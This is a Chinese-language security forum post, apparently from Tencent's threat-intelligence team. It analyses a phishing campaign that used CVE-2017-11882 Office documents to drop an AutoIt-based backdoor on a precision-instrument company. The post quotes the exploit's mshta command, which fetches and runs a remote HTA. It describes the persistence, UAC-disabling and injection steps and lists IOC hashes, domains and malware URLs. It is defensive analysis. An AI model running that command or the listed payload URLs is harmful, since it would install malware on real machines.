查看: 1497|回复: 2
收起左侧

[技术原创] 商贸信病毒针对某精密仪器公司的APT攻击

[复制链接]
腾讯电脑管家
发表于 2019-8-1 17:56:28 | 显示全部楼层 |阅读模式
本帖最后由 腾讯电脑管家 于 2019-8-2 09:49 编辑

一、背景
近期腾讯安全御见威胁情报中监测到有黑客组织利用“商贸信”病毒针对外贸行业的APT攻击再次活跃。此轮攻击的特点为,利用2017年微软公布的office公式编辑器漏洞CVE-2017-11882构造钓鱼文档,文档触发漏洞后通过mshta.exe执行由短链接bit.ly构造的远程代码,从而将后门木马植入。

在某例攻击中,我们发现攻击者使用的钓鱼文档名称中包含某精密仪器公司的全称,并且将文档成功发送至该公司的邮箱中。该文档触发漏洞执行后会下载后门木马smbn.exe,木马释放AutoIt脚本执行器,然后将高度混淆的AutoIt脚本代码传入脚本执行器执行,并安装为启动项反复执行,木马具有检测虚拟机,禁止任务管理器启动,关闭UAC,注入恶意代码到系统进程执行等功能。


“商贸信”攻击流程图

二、详细分析
钓鱼邮件


被攻击某公司为生成电脑数值控制(CNC),PCB成型机,PCB钻孔机等仪器,该公司与欧洲知名厂商合作生产,是一家全球化企业。


针对公司攻击时的邮件附件:xx精密股份限公司_3Q_pdf.doc可见黑客已经在攻击前搜集了该公司的详细信息。打开文档发现包含一张图片,标题为“commercial invoice”是卖方开立的载有货物名称、数量、价格等内容的清单,作为买卖双方交接货物和结算货款的主要单证,是进口国确定征收进口关税的依据,也是买卖双方索赔、理赔的依据。



文档中包含精心构造的CVE-2017-11882漏洞触发代码,打开文档在未打补丁的电脑上会触发漏洞攻击执行命令mshta http[:]//bit.ly/2Y3jDhx &AAAAAAAAAAAAAAA




http[:]//bit.ly/2Y3jDhx为短链接,访问时会跳转到地址http[:]//vilamax.home.pl/x/bn.hta,bn.hta继续下载和执行后门木马smbn.exe(http[:]//nextserv.pl/av/smbn.exe)



smbn.exe

smbn.exe为自解压程序,运行后释放55个文件到%Temp%/08761141/目录下。其中最关键的文件有三个:lfw.exeAutoIt脚本执行器,xql=njc为第一层脚本,phm.ppt为被加密的最终脚本。(AutoIt是一个使用类似BASIC脚本语言的免费软件,它设计用于Windows GUI(图形用户界面)中进行自动化操作,它利用模拟键盘按键,鼠标移动和窗口/控件的组合来实现自动化任务。)




解压时会通过命令行启动mvs.vbs,该脚本将 “xql=njc”文件作为参数传递给lfw.exe执行。




“xql=njc”文件被加入了大量杂质数据,因此有超过10M 大小,分析时发现里面包含真正执行的AutoIt脚本只有78行代码。


杂质中暗藏AutoIt代码:




提取出AutoIt代码只有78行:




分析“xql=njc”中的脚本代码,发现其功能为从phm.ppt中按照一定的特征如“S3tting”、“Dir3ctory”、“sK”“sN”“sData”、“esData”等定位加密数据,将加密数据解密成新的AutoIt代码后,保存至当前目录下的五位随机字符组成的文件名中,然后通过Run命令执行该脚本文件。

定位加密数据




生成五位随机名字符文件,取ASCII编码65至90(对应大写字母A至Z)




将解密后的代码写入文件(随机文件名)并通过Run命令启动执行




核心脚本

解密出的随机名脚本文件共有754行代码,同样作为参数由脚本执行器lfw.exe执行,脚本实现虚拟机检测,安装启动项,解密PE数据,注入进程执行等核心功能,并且会在执行结束后被立即删除。

脚本文件位置
C:\Documents and Settings\[guid]\Local Settings\Temp\08761141\SVDDG
C:\Users\[guid]\AppData\Local\Temp\08761141\KUEHL


再次从phm.ppt中读取加密数据




写入注册表添加启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce




关闭UAC



检测虚拟机




start.vbs添加到启动项,start.vbs执行start.cmd,start.cmd最后启动lfw.exe “xql=njc”




禁任务管理器进程启动




通过ShellExecute执行mshta.exe




执行run.vbs,该脚本同样用于启动lfw.exe “xql=njc”




将数据还原为PE结构




将恶意代码注入系统进程




连接C2地址smb3ans.pw



三、安全建议

1、不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;

2、升级office系列软件到最新版本,不要随意运行不可信文档中的宏;

3、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;

4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。




IOCs

a946caff9b3ae9aa8e8acf555564e296
f5210ee307e0b2c116bfa12b3d4a701c
678e4f45baf3f712988124a4142a50eb
96fc0ef4af7b2704194b9c04a04354a7
d22a2cd43e5b45bfc940e3fae9899548
b706d74aaede26a5b106b9ed836a33f9
7579a2ccca5100f4d669bd70916cabff
8d3cfd4833fe6e76b2ab81debad00ecb
6ee7ddebff0a2b78c7ac30f6e00d1d11
3a470a4ffb26904bae147c85c7686afb


邮箱:
jerryaccountant@yahoo.com


Domain
vilamax.home.pl
nextserv.pl
zaloparvari.ir
smb3ans.pw


URL
http[:]//bit.ly/2Y3jDhx
http[:]//bit.ly/2Sh9xDv
http[:]//bit.ly/2Gr1Tlf
http[:]//bit.ly/2Y2vDQy
http[:]//bit.ly/2SrN6f8
http[:]//bit.ly/2Gr1Tlf
http[:]//bit.ly/2YSVgQ1
http[:]//bit.ly/2Sg8m7n
http[:]//bit.ly/2Srp9Va
http[:]//vilamax.home.pl/x/bn.hta
http[:]//vilamax.home.pl/css/joibr.exe
http[:]//vilamax.home.pl/x/ny.hta
http[:]//vilamax.home.pl/a/klzb.pif
http[:]//vilamax.home.pl/css/k1tt.exe
http[:]//vilamax.home.pl/css/joyk.exe
http[:]//nextserv.pl/av/smbn.exe
http[:]//nextserv.pl/av/ktzb.exe
http[:]//nextserv.pl/av/jony.exe
http[:]//zaloparvari.ir/fries.hta
http[:]//zaloparvari.ir/freind.hta
http[:]//zaloparvari.ir/payment.doc
http[:]//zaloparvari.ir/RFQorder.doc
http[:]//netlux.in/img/bn.hta
http[:]//netlux.in/img/zb.hta
http[:]//netlux.in/img/my.hta


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
iha40999
发表于 2019-8-1 21:31:19 | 显示全部楼层
只有想不到的,没有做不到的
kfne12
头像被屏蔽
发表于 2019-8-1 22:04:49 | 显示全部楼层
apt防不胜防啊
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 11:07 , Processed in 0.128254 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表